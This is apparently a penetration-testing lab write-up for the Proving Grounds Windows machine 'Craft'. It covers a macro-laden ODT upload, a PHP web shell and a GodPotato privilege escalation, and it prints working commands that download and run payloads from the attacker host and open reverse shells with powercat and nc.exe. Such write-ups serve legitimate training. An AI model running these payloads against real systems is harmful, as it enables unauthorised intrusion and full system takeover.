Craft

Source: Proving Grounds OS: Windows Community Rating: Hard

Enumeration & Reconnaissance

  • I started with the usual autorecon and found that only port HTTP(80) was open, definitely interesting considering how these machines usually have lots of useless ports open.

HTTP (80)

Service Analysis

  • The website featured a basic CV upload function.

  • When trying to upload a file with a random extension, the site returned the error: "File is not valid. Please submit ODT file". Instead of bypassing this check, I decided to work with it and inject a macro into an ODT file.

File Validation

Gaining Initial Access

  • My first attempt was to inject a macro that downloaded a payload using iwr:

Sub Main
   Shell("cmd /c powershell iwr 'http://192.168.45.240:901/86shell.exe' -o 'C:/windows/tasks/86shell.exe'")
   Shell("cmd /c 'C:/windows/tasks/86shell.exe'")
End Sub

  • This didn’t work, likely because I was using a 32-bit payload on a 64-bit system and encountered an IE configuration error ("Explorer engine is not available…") The error shows when the first-launch configuration message of IE is not done. I switched gears and went with a more basic approach using Powercat.

Sub Main
   Shell("cmd /c powershell IEX (New-Object System.Net.Webclient).DownloadString('
http://192.168.45.240:901/powercat.ps1');powercat -c 192.168.45.240 -p 9999 -e powershell")
End Sub
Macro Injection
Trigger on Open

  • I set the macro to trigger when the document was opened, saved the file, and uploaded it. After starting my listener and waiting about 10 seconds, I got a shell.

Initial Access

Privilege Escalation

  • Once inside, I ran winpeas.exe and discovered another user was logged in: apache. From the name, it looked like this account had service-level permissions (SeImpersonatePrivilege) that could be leveraged for escalation.

  • I looked around and found that the HTTP site was hosted on XAMPP. In the htdocs folder, I saw the index.php and upload.php files we’d been interacting with. I started with the uploads directory but I couldn't upload to it. However, I was able to upload a shell to the root directory of XAMPP. After trying out pentestmonkey’s payload without success (I checked the pentestmonkey shell to know why it keeps failing, it's made to be run on Linux systems and not Windows that's why, now we know), I switched to Ivan Sincek’s PHP shell and that worked. I then used this shell to access the system as Apache.

Shell as Apache

  • Checking privileges confirmed the presence of SeImpersonatePrivilege.

SeImpersonatePrivilege

  • Since the target was running Windows Server 2019 (which rules out Juicy Potato as it works only until Windows Server 2016). There is an alternative for escalation that works with newer versions, GodPotato. For this exploit we need to know the .NET Framework first. I checked the .NET Framework version by running:

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"

  • After confirming the version, I uploaded GodPotato. Finally, I ran:

.\GodPotato-NET4.exe -cmd ".\nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.240 9109"
Shell as SYSTEM

  • This command gave me a shell as SYSTEM. (Side note: when I ran whoami, it didn’t output as expected, I don't know why, but I was SYSTEM and had the flag.)

Lessons Learned

  • ODT Uploads: Instead of fighting the file type validation, using an ODT file with an injected macro was an easier way to trigger code execution.

  • Payload Compatibility: Make sure the payload matches the system architecture; a mismatch can cause failures.

  • Pivoting Through Web Roots: Leveraging the web server’s document root (XAMPP in this case) to gain a different user context is effective.

  • Privilege Escalation Alternatives: When Juicy Potato isn’t an option (like on Windows Server 2019), GodPotato can be a reliable alternative.

PreviousAuthByNextKevin

Last updated